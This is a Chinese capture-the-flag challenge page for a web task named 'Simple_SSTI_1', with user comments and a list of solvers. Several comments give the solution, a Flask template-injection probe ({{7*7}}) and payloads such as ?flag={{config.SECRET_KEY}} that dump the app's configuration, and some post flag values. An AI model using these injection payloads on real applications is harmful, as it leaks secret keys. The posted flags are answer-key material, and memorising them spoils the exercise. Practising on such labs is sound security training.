Simple_SSTI_1WEB 未解决

分数: 5 金币: 2
题目作者: valecalida
一  血: dotast
一血奖励: 2金币
解  决: 28142
提  示:
描  述:
Simple_SSTI_1
...
登录回复
评论
HK1ng 25天前
举报

还真是简单模板注入,甚至不需要利用方法,首先传参{{7*7}}验证是否执行了语句,看到页面出现49,就知道这里存在模板注入,然后查看一下配置文件,就发现了flag。{{config}}

回复 0
看writeup刷题 1月前
举报

咋SECRET_KEY还必须大写

回复 0
Wang_Micro 5月前
举报

?flag={{config.SECRET_KEY}} flag{4c1f57d8ba21815847e7d477c3c86b81}

回复 0
超爱西西鸭 8月前
举报

/?flag={{config.SECRET_KEY}}

回复 1
yanglegeyang 8月前
举报

flag{727f54cccaa9c031b1a7c029dd2eb7d8}

回复 0
F0xyear 8月前
举报

不太懂这个漏洞啊,有没有大佬指导一下

回复 1
17856716923 8月前
举报

这个应该要去学下编程语言,模版好像是基于语言的,我去搜了答案都没看懂只能照抄

回复 0
SwanPrincess 8月前
举报

flag{208dea064bf2ad965ef8964289b32005}

回复 0
Mo木潼 8月前
举报

flask模板注入 /?flag={{config.SECRET_KEY}} flag{42d1cb43b082687661fa70767e7348ec}

回复 0
八一卜kod 8月前
举报

-4+2 赔了啊

回复 0
1512405623 9月前
举报

flag{4a5b27a4e8b461441e6d8b7df1573130}

回复 0

WriteUp

image
valecalida

5 金币

立即查看

评分(49)

解题动态

3268798994 攻破了该题 1天前
peach.peach 攻破了该题 2天前
a5580990 攻破了该题 3天前
2269264191 攻破了该题 5天前
pezn1and 攻破了该题 6天前
1145141145 攻破了该题 7天前
IsPP 攻破了该题 7天前
prettyLife 攻破了该题 7天前
17364302189 攻破了该题 8天前
jiayouya 攻破了该题 8天前
不上早八 攻破了该题 8天前
自由魂儿儿儿 攻破了该题 10天前
forces 攻破了该题 10天前
1720713439 攻破了该题 10天前
an0n0my 攻破了该题 11天前
w1w2w3666 攻破了该题 11天前
GnawKing 攻破了该题 12天前
19933663636 攻破了该题 12天前
luvwind 攻破了该题 13天前
DBON 攻破了该题 14天前
问题反馈